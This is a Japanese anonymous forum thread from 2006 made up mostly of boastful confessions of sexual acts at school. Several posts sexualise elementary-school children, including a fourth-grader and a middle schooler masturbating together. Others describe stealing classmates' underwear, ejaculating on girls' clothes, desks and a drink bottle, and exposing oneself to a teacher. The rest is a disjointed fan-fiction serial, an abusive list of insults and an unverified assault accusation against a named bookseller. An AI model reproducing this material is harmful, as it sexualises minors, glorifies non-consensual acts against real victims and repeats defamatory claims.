憧れの子達のすく水を見れて興奮してたおれは、ばれないように更衣室の裏に回りオナニー使用と思った。


231 :ユーは名無しネ:2006/08/30(水) 14:47:35
チムコにボツボツできた



クラミジア症候群??だと思うけどそれが原因??




あの後もナプキンオナ繰り返してたし…




あの後はそとトイレとか夜に行ったり





他校でもナプキン採りやすそうな外トイレ




あったら忍び込んでオナってたよ





女バス部の倉庫??のドアの手で開けるためのくぼみに




ぶっかけたりしてた


232 :ユーは名無しネ:2006/08/30(水) 14:49:52
ヒラメ「悪魔はどんな手段で俺達を襲ってくるかワカラナス」




鮎「強い意思を持ってれば操られたりしないよ」




沙紀「沙紀と鮎も戦闘衣装ならいいのに…」




ストロベリー「沙紀は今の可愛い服の方がイイとオモ」




鮎「俺は〜?」





ヒラメ「オマイは次の衣装アイテムまでその服で行け」



ストロベリー「どうする?次の衣装アイテムがダサかったら」





鮎「着ねーよ」

233 :ユーは名無しネ:2006/08/30(水) 14:52:43
【悠斗】
「ただーいまッと」




【聖夜】
「おかえりー、お兄ちゃん☆」





【悠斗】
「おう、帰った帰った」






【悠斗】
「…………」





【悠斗】
「ッて、うわらば!?」





 俺は、出迎えた姿に、ド肝を抜かれた。





【聖夜】
「うわらばー?」



234 :ユーは名無しネ:2006/08/30(水) 14:53:23
学校でオナニーしたことはないけど、





小5の時、学校に無断で2日間も泊まったことはあるよ。






親に怒られて、次の日学校から帰らず、そのまま宿泊。







夜は保健室のベットで就寝、その次の日も宿泊。


235 :ユーは名無しネ:2006/08/30(水) 14:53:59
体育の時間に脱いであった好きな女の子のストッキングを持ち出して





そのままトイレに入ってストッキングをチムポにかぶせて射精した






あれは確か中学3年の高校受験を控えた時期だった、あの頃は中学生






でも黒いストッキングを履いていたんです


236 :ユーは名無しネ:2006/08/30(水) 14:55:03
思い出したので書きます。




あれは小学4年くらいの夏、俺は夏休みの宿題をやってなくて




みんなが体育の時間でプールに入ってるときに宿題の残りを一人でやらされていた。




絵日記を書きながら隣の席の好きな女の子の事を思い出した。




考えてみたら隣の席の女の子の服、下着は机の上に置きっぱなし。


237 :ユーは名無しネ:2006/08/30(水) 14:55:48
もう俺は『この子の下着の匂いを嗅いでオナニーしたい』と思い実行した。





恐る恐る着替えの山を崩し、一番下にあるパンツに辿り着いた。






いまでもあのふかふかした手触りを覚えている。ケロケロケロッ○の絵がプリントされた可愛らしい物だった。






それを俺は鼻息を荒くしながら広げあの子の大切な部分が当たるであろう場所を顔に押しあてた。







特に匂いはなかったが自分がしている行動にとても興奮した。


238 :ユーは名無しネ:2006/08/30(水) 14:57:54
ヒラメ「衣装の威力は実際凄い」




ストロベリー「ココを越えたら悪魔と御対面かあ…嫌だね」





鮎「!!!!悪魔といえば…天使…俺が闘わなきゃいけない………」





ヒラメ「なるほど!天使か!鮎…オマイの出番になりそうだな」

239 :ユーは名無しネ:2006/08/30(水) 14:58:39
特に匂いはなかったが自分がしている行動にとても興奮した。





まだ剥けてない俺の小さな股間ははち切れんばかりに膨らんでいた。






そして俺はそのパンツを股間に押しあて擦り付けた。甘い感覚が下半身を包みそして絶頂を迎えた。






その当時まだ精通はしていなかったのだが終えたあとのパンツを見てみると




驚いたことに押しあてた個所だけぬるぬるになっていた。




まあ、それはなんとか体育の時間が終わる前に乾いたからいいんだけど





まさか初学校オナで初下着オナで初射精をするとは思わなかった。

240 :ユーは名無しネ:2006/08/30(水) 14:59:22
俺の精通はセブンでエロ本読んでてなんか





小便漏れたような気がしたのでトイレを借りた





そしてパンツを触るとあまり濡れてなくてちょっとヌルヌルしてた





「何だこれ…なんか気持ちいいな…」と思い





またエロ本読みまくって精子をもっと出しといた





今思うと何でエロ本なんかで精通してんだって話だよ


241 :ユーは名無しネ:2006/08/30(水) 15:00:11
高校時代は部活の更衣室が男女一緒でしたので皆が外に出ていってる



時は怪しまれずに触り放題でした^^なぜ一緒かと言うと




美術部だったので下着類は着替えたりせず制服の上着とスカートを




着替えるだけでしたので。




しかも当時はなぜか女子部員が多くてよかったです。




でも中には汚されたのに気付いた子もいたと思いますね、


242 :ユーは名無しネ:2006/08/30(水) 15:00:52
中三の頃。




爺ちゃんの葬式(13時〜)に間に合わすために別室で中間テスト受けた。




まぁ中学生のテストなんて気楽なもんだから先生の監視もなく一人っきり。





いつもより早いペースで解いてすかさずオナったよ。





ちなみにこのテストで初めて学年一位を取りました。


243 :ユーは名無しネ:2006/08/30(水) 15:06:50
ヒラメ「鮎…一人で頑張らなくてイイ…俺達がいるからね」




ストロベリー「この崩れた崖歩きにくいよママン」





鮎「沙紀ちゃん大丈夫?」




沙紀「なんとか…けどキツイね結構…」




ピー(無線)



(河合)「やけに楽しそうですね君達」




ヒラメ「そーゆう事をいちいち無線で言うなー!」


244 :ユーは名無しネ:2006/08/30(水) 15:07:52
勉強してると自分の意志とは無関係に勃つのはなぜだろう。





高校の頃自習室でよくしてた。4つの机が風車状に





くっついてて他の人の顔が見えない…が!隠れてパンチラを見ながらできた。






たとえ見えなくてもにほいだけでイケた。


245 :ユーは名無しネ:2006/08/30(水) 15:08:41
何故始めちゃったかは覚えてないが、ズボンの上から両手で擦ってた。
最初は、周りに気をつけてたような気がするが、途中から熱中しすぎて



周りの視線に気がつかなかったのよ。




で、逝った後(まだ精通はしてない)にふと横から視線を感じて見ると、




女の子が唖然とした感じで見てたorz




「な、なにしてんの???」




「あ、あう・・・ん・・・・け、消しゴムのくずを掃ってたんだよ!」




「ふ〜ん・・・」





と、一応は納得してたみたいだけど、今考えればどう見てもオナニーだ





ってばれてたよな。





それ以来、授業中のオナニーはしないようにした。


246 :ユーは名無しネ:2006/08/30(水) 15:09:14
オナニー覚えたてで嬉しくて暇があればやってるんだよな





片手でズボンの上から指の第一関節でひたすらこすってた






適当に先生の話とか聞きながら、終わりごろになってフィニッシュ






他の人や先生にも絶対見られたよな


247 :ユーは名無しネ:2006/08/30(水) 15:10:00
別に学校でオナニーする事が悪い事だとは思っていなかったからいいだろ





俺いっつもオナニーする時はズボンの上からだったから、






精液もティッシュで拭かずにひたすら自然乾燥させてて







ズボンやパンツにシミ付きまくってたのな


248 :ユーは名無しネ:2006/08/30(水) 15:11:18
♀ですが、オナニーもエッチも大好きで小学校4年生の時からしてましたね。





今も毎日かかさず、ヤラないと逆に寝れません。





小学校の時、体育の授業を風邪か何かで休み、





良い子に椅子にもたれオナニーを楽しみました。





先日初めて軽いスカトロ経験しました。





性欲は本当につきません。


249 :ユーは名無しネ:2006/08/30(水) 15:17:34
♀ですが、オナニーもエッチも大好きで小学校4年生の時からしてましたね。






今も毎日かかさず、ヤラないと逆に寝れません。






小学校の時、体育の授業を風邪か何かで休み、





教室で一人読書でした。





良い子に椅子にもたれオナニーを楽しみました。





先日初めて軽いスカトロ経験しました。





性欲は本当につきません。


250 :ユーは名無しネ:2006/08/30(水) 15:17:49
ストロベリー「ヒラメ…今日はココで泊まろうよ」



ヒラメ「そうだな…よし!休むか!沙紀晩飯準備だ」




鮎「なんで一人にやらせるんだよ!そーゆうのよくないよ!」




ストロベリー「じゃあお前が手伝ってやればいいだろ」





ヒラメ「悪いな…俺は明日の戦闘計画をたてなきゃならないんだ」





沙紀「食料調達してくるね」

251 :ユーは名無しネ:2006/08/30(水) 15:21:26
鮎「俺も水汲んでくる」



ヒラメ「ストロベリー…オマイ何寝てんだよ」




ストロベリー「鮎と沙紀が作るかなーって…」




ヒラメ「空気読め!!!!」




ストロベリー「スミマセンスミマセン 逝ってきます」

252 :ユーは名無しネ:2006/08/30(水) 15:22:25
漏れが高三の時模試が終わって夜になっていた。ふと漏れが好きだったS、Yさんは体操着を





よく学校に置いてある事を思い出しそれをオカズにオナヌをすることにした。





彼女の席の横にかけられていた袋には彼女の体操着が…





急いでそれを取り出し自分のカバンに入れてトイレに行った…






そして体操着の匂いを嗅ぐと物凄いいい匂いがした。恐らく84のような







253 :ユーは名無しネ:2006/08/30(水) 15:22:59
スプレーでもかけたのだろうか、そしてその体操着を自分のに包み





しごきはじめた、頭の中でS、Yさんの白くてスラっとした脚と彼女の






可愛い顔を思い浮かべながらしごいていた、高2の時彼女の脚を凝視して






その後トイレで抜いた事もある。そして彼女の体操着に精液をかけ急いで


254 :ユーは名無しネ:2006/08/30(水) 15:23:30
ティッシュで拭いて体操着を戻した。そしてある日の体育の時彼女が体操着





の匂いを嗅いで変な匂いがすると笑っていた、そして女子数人でその匂いを





嗅いでいた。俺の精液の匂いとも知らずに…





勿論それもオカズにしました。今でも時々卒業アルバムを見ながらその






事を思い出して抜いています。まあその子の脚だけで抜けるんですが…


255 :ユーは名無しネ:2006/08/30(水) 15:24:12
移動教室での授業中に、忘れ物を取りに行ってきます。と先生に





言ってから教室に行きました。





もちろん誰も教室にはいません。





なので女の子のカバンの中にあったペットボトルにちんこを





なすりつけときました。





ちょっとだけおしっこもだしときました。





スレ違いだったかな?


256 :ユーは名無しネ:2006/08/30(水) 15:25:30
自分のツレが理科室の授業中に一番後ろの席でモロに出してシコッてた。





その日は実験の為体操服で授業受けてそれをネタにしたらしい。





まじ尊敬したよ。


257 :ユーは名無しネ:2006/08/30(水) 15:30:34
ストロベリー「魚をとろう!」




鮎「おっ!いいね〜今夜は魚かぁ」




ストロベリー「じゃあ俺はあっちの方で魚とってくるね」





鮎「お願いしまーす!」




それぞれ役割を決めて食料調達に取り掛かった

258 :ユーは名無しネ:2006/08/30(水) 15:31:12
学校でオナニーなんて結構できたぜ?





俺は一時間目わざと遅刻していって学校のいたるところでオナったなあ






静寂の中開放感と罪悪感(?)とスリル渦巻く中でのオナは最高!






使われていない教室で全裸になりエロ本(持参)広げながら優雅にオナニー






いつかここで同じ状況でセックスしてやると心に決めた






決めただけだったけどね


259 :ユーは名無しネ:2006/08/30(水) 15:31:43
  絆  w  w  w  w


  触  る  な  ヴ  ォ  ケ  !  !  w  w  w  w


  絆  w  w  w  w


  触  る  な  ヴ  ォ  ケ  !  !  w  w  w  w


  絆  w  w  w  w


  触  る  な  ヴ  ォ  ケ  !  !  w  w  w  w


  絆  w  w  w  w


  触  る  な  ヴ  ォ  ケ  !  !  w  w  w  w


  絆  w  w  w  w


  触  る  な  ヴ  ォ  ケ  !  !  w  w  w  w


  絆  w  w  w  w


  触  る  な  ヴ  ォ  ケ  !  !  w  w  w  w



260 :ユーは名無しネ:2006/08/30(水) 15:32:14
小2の時の学習発表会。





体育館が真っ暗でなぜか興奮して、





スカートに手突っ込んでパンツの上からクリ弄ってた。





小2のくせにイッた。





その後ふと横を見ると、担任がにやにやしながらこっちを見ていたORZ


261 :ユーは名無しネ:2006/08/30(水) 15:32:47
小4の夏の夕方、近所のガキの親戚(中2)とその人んちで遊んでた。





その人の事すごい好きで普通にチューとかしてた。





下見せてって言われて脱いで、そのまま二人でオナ見せ合った。






今ならあんな状況でフェラも挿入も無しなんて事考えれない。






幼い頃に戻ってもっと色んな人と見せ合いたい。


262 :ユーは名無しネ:2006/08/30(水) 15:33:27
視聴覚室で映画?かなんかを見る時間で教室が真っ暗になるときにした。






となりがかわいい娘でちんこまるだしで床に出した。






あとは席が端の一番後ろだったとき、授業中にズボンのポケットに手入れてしたこともある。






そのときはパンツの中に出したから後で後悔したけど考えてる暇ないんだよな。






アホな中一だったんで許してくれ。


263 :ユーは名無しネ:2006/08/30(水) 15:33:49
だいぶ時間が過ぎた


          
沙紀「ただいま…都まで行ってお米を買ってきたよ」






鮎「水沢山汲んできたよ」






ストロベリー「はいよー!魚!」





ヒラメ「確か最初の頃の味噌があったな」




本日はご飯と魚の味噌汁を作る事になった

264 :ユーは名無しネ:2006/08/30(水) 15:34:17
中2のころ若くて綺麗な理科の先生がいて毎日のようにオカズにしてた。





先生が入った後のトイレに忍び込んだりした事もあった。






その時は先生のオシッコの匂いを思いっきり吸い込んだら凄く興奮してそのままトイレで射精した。






3学期の頃には段々エスカレートして、理科の授業が終わった後にトイレでオナニーして






準備室に一人でいる先生の所にわざとイカ臭いまま毎回質問しに行ってた。






大人しい先生だったから何も言われなかったけどあの態度は絶対気付いてたと思う。






わざとチャック全開で勃起させながら行った時は明らかにキョドっててうけたw


265 :ユーは名無しネ:2006/08/30(水) 15:34:56
高3のとき、学校が休みの日に教室に行き、ギャルっぽい女の体操服で





抜きまくってた。めぐみの体操服の匂いを嗅ぎながらしょう子の体操服を





チンコに巻きつけてシコシコした。最後はめぐみの机にぶっかけて





ザーメンを塗りこんでおいた。次の日学校でその机に顔を伏せて寝ている





めぐみを見てかなり興奮しました。


266 :ユーは名無しネ:2006/08/30(水) 15:35:59
小学5年生のとき夏休みのプール教室で。





潜水して遊んでいたら偶然プールの底にパンツの前があたりmukumukuと勃起。





一瞬気持ちがよかったので水面に顔を出してイキをついでまた潜水を繰り返す。





突っ張ったパンツの前を底にこすりつけるたびに快感が増幅していき、





次第に何かギンギンするような感覚が沸いてきた。


267 :ユーは名無しネ:2006/08/30(水) 15:36:56
この先どうなるのだろうと思いつつ、もっと気持ちよくなりたいと続けていたら、






キュイーンという何かを絞りだされるような、感じがこみ上げてきた。






すると思いがけず、チンチンがものすごい快感をともなって、






ギュん ギュん ギュん、ギュんという感じで、勝手に暴れだした。






遂に何かをやってしまったという感じで、何事が起こったのか理解できずにいた。






着替えたあとの水泳パンツを見たら白いモノが残っていた。 






それとは知らずにやった体験。


268 :ユーは名無しネ:2006/08/30(水) 15:42:28
ヒラメ「俺は綿密な計画を立てなきゃならないからオマイら先に食べてて」






ストロベリー「うぃーす!」




鮎「沸騰してきたよ」




沙紀「おいしいかな」





ストロベリー「闘いの後の飯はうまいよね」





いただきまーす

269 :ユーは名無しネ:2006/08/30(水) 15:45:23
低脳低俗キチガイ苺と苺担の特徴


・社会の寄生虫である
・すぐムキになる
・中身がないので言葉で自分を飾り立てて立派に見せようとする
・自己解決をすぐ諦め親や他者にすがる
・努力不足を認めずすぐ社会のせいにし、自らを社会の被害者だと信じて疑わない
・自己主張とわがままを履き違えている
・こんな田舎いつでも出て行ってやると言うが絶対出て行かない
・まともな職がなく都会に出られなかった残りかすしかいない
・親や周囲の人間を不幸にするのが得意
・自分が攻撃されると他者に標的を逸らさせようとする
・都合の悪い話題になると話のすり替えを試みる
・自分の置かれた立場に鈍感である
・前頭葉が退化してるので自分で物事を判断できない
・コミュニケーション能力が低いのでどんな社会になってもオチコボレの域を脱せないことがわかっていない
・社会のオチコボレなのは本能的に感じている
・人生上の過ちを過ちとして受け入れず次に生かそうとしない
・言葉につまると生んだ親が悪いとすぐ言う
・まともな恋愛をしたことがないので他者への思いやりに欠け自己中である
・厳しい現実を突きつけられると陰謀論を唱え、周囲の恐怖を煽ろうと試みる
・ただれた寄生虫ライフをずっと続けていけると未だに妄想している
・いずれ誰かが何とかしてくれると甘い期待を持つ
・自らの「責任」「負担」は忌避するが、他人にはそれを厳しく求める
・立場の危うさを指摘されると、相手を同類認定しその範疇に取り込もうとする
・自分の物と他人の物の区別ができない
・多様な価値観が理解できず自分の価値観が正しいと思い込んでる

270 :ユーは名無しネ:2006/08/30(水) 15:46:51
いつも通り放課後、女子トイレに入って全裸オナニーしてたら、





女子が入ってきて前の個室に入ったので、



ドアを空けて個室の横でオナろうと思いドアを開けた。






そしたら、なんと鏡の前でもう一人の女が髪の毛セットしていて、鏡越しにオレが見えた。






(全裸で勃起してる。)







すぐさまドアを閉めそのまま前の女子がちょうどお尻を向けてる方向に射精した。


271 :ユーは名無しネ:2006/08/30(水) 15:47:36
その後前の女子が用を足して、鏡の前にいる女子と合流し、少し何か小声で話しながら急いで去っていって、






廊下に出て、廊下の女子一人と合流した瞬間、






「開けよ!開けよーよ!!」






物凄い勢いで服を来たオレは個室の外に出た。女はスモッグの鏡越しにオレを見て、






「こっち見てる…」






開き直ろうと思ってドアの前まで行ったが我に返り、個室に戻った。すると、






「いこいこー」






と言って去っていった。







隠れてるかも知れない恐怖を感じながらドアを開けるとそこには誰もいなかった。


272 :ユーは名無しネ:2006/08/30(水) 15:47:48
ストロベリー「味があんまりないけど食べれない事はないね」





沙紀「ちょっと薄かったかな」





鮎「塩がいるね」






ストロベリー「味噌汁に塩はいらねーだろ!!!」





鮎「明日オニギリ持っていきたくない?」






沙紀「いいね!塩調達してこなきゃ」


273 :ユーは名無しネ:2006/08/30(水) 15:53:16
視聴覚室で映画?かなんかを見る時間で教室が真っ暗になるときにした。






となりがかわいい娘でちんこまるだしで床に出した。






あとは席が端の一番後ろだったとき、授業中にズボンのポケットに手入れてしたこともある。






そのときはパンツの中に出したから後で後悔したけど考えてる暇ないんだよな。






アホな中一だったんで許してくれ。


274 :ユーは名無しネ:2006/08/30(水) 15:54:05
うちの高校、変態だらけの、クソ学校。






ブルマ、スクール水着、コッソリ盗むどころか、






白昼堂々、教室で、頭にかぶるバカ高校生。






化粧してセーラー服着てくるオカマちゃん高校生。






教室でチンコ露出、射精を公開するバカ高校生。






こんなやつばっかの、クソ学校。


275 :ユーは名無しネ:2006/08/30(水) 15:55:18
そしてヒラメ以外は比較的自由な時間を過ごした




鮎「何作ってるの?」




沙紀「明日のオニギリ」





鮎「俺も作るー!」




沙紀「途中で食べちゃいたくなるね」






鮎「ほんとだねっ」






ストロベリー「あっ!うまそー」




パクッ……………………しーん…………

276 :ユーは名無しネ:2006/08/30(水) 15:55:45
 線香からして、






教室で、抱き合ってても、怒らない。








SEXしかたを、ビデオで解説する、エロ教師。





ヤリ砲台の、楽園高校。こんな高校、卒業できない。


277 :ユーは名無しネ:2006/08/30(水) 15:56:31
高校時代に全校朝会で校長が話してるとき隣の奴とふざけてたら






校長がキレて「そこのお前!前に出てきてオナニーしなさい!」って言ったから






しょうがなく全校生徒の前でオナニーしたことがあったなぁ・・・






あのときは最高に興奮したよ



278 :ユーは名無しネ:2006/08/30(水) 15:57:26
卒業式の日にしましたよ。写真撮ったりしたかったが誰にも声かけてもらえず、






すぐに帰るのも寂しかったのでトイレに隠れてました。まったく女の子に相手に






されなかった高校3年間を思い返しながらシコシコしてました


279 :ユーは名無しネ:2006/08/30(水) 15:58:26
厨房の頃、ミニスカート姿で練習してる





テニス部員を良い位置で見るために陸上部に入った






良かったことに陸上部は過疎だったんで部活に出ても殆ど俺だけだった。






それからというもの窓からずっとテニス部のブラチラ見てオナニーしてた。






部室がイカ臭くなったのは言うまでもない。


280 :ユーは名無しネ:2006/08/30(水) 15:59:51
学祭の時俺は学祭の役員だった。ステージ横の階段登った小部屋で、







「あぁ、この壁隔てた向こうに全校生徒がいるのに‥今はみんな閉会式やってんのに‥ハァハァ」







ってオナニーしたことある。







なんかバレそうでバレないオナニーって興奮すんだよねwww俺だけ?


281 :ユーは名無しネ:2006/08/30(水) 16:10:27
鮎「あーーーー!!!何で食っちゃうんだよー!!!!!」






ストロベリー「そこにオニギリがあるから」






沙紀「これは明日のなの!」





ストロベリー「スミマセンスミマセン」





沙紀「じゃあストロベリーちゃんも手伝ってね」






ストロベリー「はい!」







こうして今夜はオニギリ作りに燃える3人であった

282 :ユーは名無しネ:2006/08/30(水) 16:12:46
気象庁(大手町)の1Fにある本屋「津村書店」についての裏事情

ここにいる70歳くらいの、頭の完全に禿げた眼鏡をかけたジジイは、とにかく短気かつ凶暴である。
以下にこのジジイの悪行を、一部であるが記す。

・まず、本屋で5分以上うろついていると、「何か買いたい物があるか」と突慳貪に言い、
黙っているか、「いいえ」とか言うと、「買う気がないなら、出て行け」と言う。
・次に、立ち読みでもしていようなら、腕をつかんだ上で、奥に連れて行き、殴る蹴るの暴行を
加える。過去に顔にあざができたり、鼻血が出たりしたケースもあったらしい。また、女性の場合
胸を揉むなどの、セクハラをしたこともあったとか。
・一見ひ弱そうに見えるが、実は、柔道黒帯,合気道二段の腕前。そして、足も速い(笑)
・そして、納品作業をしていると、客がいようがお構いなしに「そこ邪魔だ、どかんかい」
と怒り、睨み付ける。(場合によっては足で蹴る)ちなみに店内は非常に狭い。そして本の陳列も非常に雑。
・極め付けは、清算をする時。例えば320円の雑誌を買って、1020円を出そうものなら
「何故1000円札一枚で出さない?計算しにくいんだよ、アホンダラ」と言って、20円分を投げる。また、お釣りは投げるようにして、渡される。

ここの本屋は、マニアックな本は多いが、品揃えは悪い。そして、何と言っても、上記のように主人の
接客態度が最悪。
こんな本屋で買い物をするのは、極力避けた方が良いとアドバイスしておく。


283 :ユーは名無しネ:2006/08/30(水) 16:13:29
ヒラメ「おーう!オマイら!液体と服の威力スゲーよ!」



マヨ「もうベジータに勝てるんじゃね?」


ヒラメ「それはまだ早い」


河合「ストロベリーは?」



ヒラメ「何やら雑草が自分を必要としているとか言いながら駆けて行った」



マヨ「イミフ」



鮎「それ薬草かも…」

ヒラメ「回復アイテムか!あのヤロー!!!!」


284 :ユーは名無しネ:2006/08/30(水) 16:14:02
マヨ「え?」









ヒラメ「鮎とストロベリーはどうしたんだよ!」






河合「昨日までいたよな?」







マヨ「俺達も途中から会話なんかしてるパワーなかったからなぁ…」







ヒラメ「どうするんだよ!」



285 :ユーは名無しネ:2006/08/30(水) 16:14:40
ストロベリー「私のも白いカンフー系の帽子がついてます!」


河合「なんかオシャレだね」








マヨ「似合ってるよ」










ヒラメ「何気に地上まで飛び降りれそうな気がするんだ」








ヒューーーーー


286 :ユーは名無しネ:2006/08/30(水) 16:15:13
ヒラメ「ストロベリーがさぁどうしても仲間になりたいって言うんだよね」








鮎&マヨ&河合「いいよ」








ヒラメ「ただ…黄色い雲に乗れるかと…」









鮎「大丈夫っしょ〜」










ヒラメ「途中加入で調子に乗らなきゃいいんだけど…」


287 :ユーは名無しネ:2006/08/30(水) 16:16:53
話がおかしくなってきたので打ち切り

288 :ユーは名無しネ:2006/08/30(水) 16:17:43
ヒラメを先頭に彼等は登り始めた








河合「さすがヒラメだよなぁ」











マヨ「負けてられないな」












鮎「俺達にもできるよ」














ストロベリー「さぁテッペン目指すぞ!」


289 :ユーは名無しネ:2006/08/30(水) 16:20:42
最終回はベジータのあまりの強さに苦戦し河合とマヨが加わってジャニーズの勝利

290 :ユーは名無しネ:2006/08/30(水) 16:23:01
ヒラメ「オマイら…分かってるとは思うがこれからは敵が増える」







3人「そうだな」







ヒラメ「最終目標はベジータだ」








鮎「うん…」









ヒラメ「そこに辿り着く迄これから大変だと思う」


291 :ユーは名無しネ:2006/08/30(水) 16:23:36
ストロベリー「私のも白いカンフー系の帽子がついてます!」


河合「なんかオシャレだね」








マヨ「似合ってるよ」








ヒラメ「何気に地上まで飛び降りれそうな気がするんだ」









ヒューーーーー


292 :ユーは名無しネ:2006/08/30(水) 16:24:35
ヒラメ「1コ下の友人にストロベリーってのがいるんだけど呼ぼうかな」







マヨ「俺は2コ下に友達いるからそいつ呼ぼうか?」







鮎「俺は同級に友達いるからソイシ呼ぼうか?」








河合「俺もLightって知り合いいるんだけど連れてこようか?」


293 :ユーは名無しネ:2006/08/30(水) 16:36:49
ジャニの勝ち

294 :ユーは名無しネ:2006/08/30(水) 19:20:08
今の所翌日の為のオニギリ作りで終わっている

295 :ユーは名無しネ:2006/08/30(水) 19:46:52
ヒラメ「加入者は責任持って俺が連れてくる」



鮎「楽しみだね」




ストロベリー「どんな人かな」




ヒラメ「ストロベリー…オマイが来る時もそうやってみんなワクワクしてたよ」




ストロベリー「ありがとうございます!」




そして夜も更けた


296 :ユーは名無しネ:2006/08/30(水) 21:58:56
〜一旦終了〜

297 :ユーは名無しネ:2006/08/30(水) 22:12:42
ピー


ストロベリー「無線だ」



ヒラメ「はいよー」



(マヨ&河合)「お前らなんだよ!俺達が抜けたらまた人を加入させるわけ?」



ヒラメ「河合がいなくなったから料理してくれる人を入れるんだよ」


ストロベリー「お前ら抜けたくせにいちいちうるせえよ」



バシッ!




ヒラメがストロベリーを扇子で叩いた


298 :ユーは名無しネ:2006/08/31(木) 00:07:37
〜一旦再開〜

299 :ユーは名無しネ:2006/08/31(木) 00:10:21
鮎「明日は遂に悪魔と対決かぁ…スタミナつけなきゃ」




スタミナ「沙紀も闘う?」




沙紀「うん!みんなの力にならなきゃだからね」






鮎「ヒラメに晩御飯持って行ってあげよっか」




ストロベリー「そうだね」





3人はヒラメに晩御飯を渡し眠りについた

300 :ユーは名無しネ:2006/08/31(木) 00:15:41
翌早朝



ストロベリー「朝だよー朝だよー!!!」





鮎「おはよ……」





ストロベリー「ヒラメも沙紀も起きないよ」






鮎「疲れてるんでしょ…もう少し寝かしといてあげようよ」






ストロベリー「何甘い事言ってんだ!そんな生ヌルイ事言っててベジータに勝てると思ってんのか!!」








鮎「それが言いたいだけでしょ?」





こうしてもう少しヒラメと沙紀を寝かせる事にした

301 :ユーは名無しネ:2006/08/31(木) 00:16:37
〜一旦終了〜

302 :ユーは名無しネ:2006/08/31(木) 00:19:31
>299
スタミナ「沙紀も闘う?」

orzストロベリーだ

303 :ユーは名無しネ:2006/08/31(木) 00:35:27
ヒラメ「加入者は責任持って俺が連れてくる」



鮎「楽しみだね」




ストロベリー「どんな人かな」




ヒラメ「ストロベリー…オマイが来る時もそうやってみんなワクワクしてたよ」




ストロベリー「ありがとうございます!」




そして夜も更けた


304 :ユーは名無しネ:2006/08/31(木) 00:36:01
ヒラメ「1コ下の友人にストロベリーってのがいるんだけど呼ぼうかな」




マヨ「俺は2コ下に友達いるからそいつ呼ぼうか?」




鮎「俺は同級に友達いるからソイシ呼ぼうか?」




河合「俺もLightって知り合いいるんだけど連れてこようか?」




305 :ユーは名無しネ:2006/08/31(木) 00:37:00
ヒラメ「オマイら…分かってるとは思うがこれからは敵が増える」






3人「そうだな」





ヒラメ「最終目標はベジータだ」






鮎「うん…」







ヒラメ「そこに辿り着く迄これから大変だと思う」


306 :ユーは名無しネ:2006/08/31(木) 00:47:41
こんなに細々やってんのに何故見つけるorz

307 :ユーは名無しネ:2006/08/31(木) 01:12:29
聞いてないけど、ウルフルズか?




ちなみに





アホでケッコー






唄 ウルフルズ








作詞 ウルフルズ





308 :ユーは名無しネ:2006/08/31(木) 01:56:47
再開


鮎「ヒラメ〜起きなよ〜」




ストロベリー「オマイらの朝飯食っちまうぞー」





ヒラメ「あ〜〜〜〜よく寝た〜」






鮎「おはようヒラメ」

309 :ユーは名無しネ:2006/08/31(木) 02:00:10
ストロベリー「沙〜紀〜!起きないなら置いていくぞー」





沙紀「う〜」





鮎「起きた!沙〜紀ちゃん!おはよー」






沙紀「……あぁそっか…家じゃないんだった」




ヒラメ「オマイらー!朝飯だーっ!!!」





ストロベリー「よく起きてすぐあんなテンソン高いよな…アリエナス」

310 :ユーは名無しネ:2006/08/31(木) 02:03:40
4人は朝食を取り悪魔のいるところへ向かう




ヒラメ「一体あとどれだけ崖を歩けばいいんだろうな」






ストロベリー「道は長いね…城がまるでひとつの世界だよ…デカすぎ」



一旦終了

311 :ユーは名無しネ:2006/08/31(木) 02:20:56
再開


約一時間歩き続けた




鮎「うわぁ…嫌な空気」





ストロベリー「重い…鉛背負ってるみたい」





ヒラメ「悪魔ー!!!!!!出てこい!!!!」





一瞬凄まじい風がふいた

312 :ユーは名無しネ:2006/08/31(木) 02:24:34
悪魔「ナニヲシニキタ…」



ヒラメ「西の都の平和を奪ったオマイを許さん!!!!!!」





悪魔「デテイケ」





ヒラメ「さぁ悪魔!!!!いざ勝負!!!」




悪魔「ハハハハハ」





ヒラメ「消えた!?」





ストロベリー「うわああああ!!!!!」

313 :ユーは名無しネ:2006/08/31(木) 02:28:39
ヒラメ「沙紀大丈夫か?」



沙紀「どうにか…びっくりした…」




ヒラメ「最終目標のベジータはあんなもんじゃないからな」






ストロベリー「ジャニVSベジータだから沙紀はもしかしたらベジータとの闘いは無理かもしれないよ」





ヒラメ「そうだった!!!!!!なんてことだ…orzすっかり忘れてた」






しかしココは大きな城だ…






目の前は壁で塞がっている


314 :ユーは名無しネ:2006/08/31(木) 02:29:12
マヨ「どうして黄色雲使わないの?宝の持ち腐れだよ」





ストロベリー「乗りたい!」




ヒラメ「ダメだ!そうやってラクな方にラクな方にいくな」





マヨ「ちょっと厳しすぎない?まあ俺はもう戻るけどさ…」




そう言ってマヨは戻っていった




ヒラメ「さあ続きだ…バテるなよ?オマイら」





ストロベリー鮎沙紀「はい!」


315 :ユーは名無しネ:2006/08/31(木) 02:29:30
ヒラメ「ストロベリー!!!!!」



悪魔はストロベリーの血を吸い始めた




ストロベリーはその場に倒れ込んでしまった





ヒラメ「クッソー!!!人間技じゃねーよ」






鮎「やめろー!!!!!!」






悪魔「オオ…」





悪魔は鮎の美貌に一瞬くらんだ




沙紀「今だよ!」





ヒラメの剣が悪魔の体を突き抜けた!!!!!!!

316 :ユーは名無しネ:2006/08/31(木) 02:29:53
ヒラメ「悪魔はどんな手段で俺達を襲ってくるかワカラナス」




鮎「強い意思を持ってれば操られたりしないよ」




沙紀「沙紀と鮎も戦闘衣装ならいいのに…」




ストロベリー「沙紀は今の可愛い服の方がイイとオモ」




鮎「俺は〜?」





ヒラメ「オマイは次の衣装アイテムまでその服で行け」



ストロベリー「どうする?次の衣装アイテムがダサかったら」





鮎「着ねーよ」


317 :ユーは名無しネ:2006/08/31(木) 02:30:25
ヒラメ「オマイら…分かってるとは思うがこれからは敵が増える」







3人「そうだな」







ヒラメ「最終目標はベジータだ」







鮎「うん…」









ヒラメ「そこに辿り着く迄これから大変だと思う」


318 :ユーは名無しネ:2006/08/31(木) 02:31:00
翌早朝



ストロベリー「朝だよー朝だよー!!!」





鮎「おはよ……」





ストロベリー「ヒラメも沙紀も起きないよ」






鮎「疲れてるんでしょ…もう少し寝かしといてあげようよ」






ストロベリー「何甘い事言ってんだ!そんな生ヌルイ事言っててベジータに勝てると思ってんのか!!」








鮎「それが言いたいだけでしょ?」





こうしてもう少しヒラメと沙紀を寝かせる事にした


319 :ユーは名無しネ:2006/08/31(木) 02:35:23
沙紀「え…」



悪魔がスッと消えた





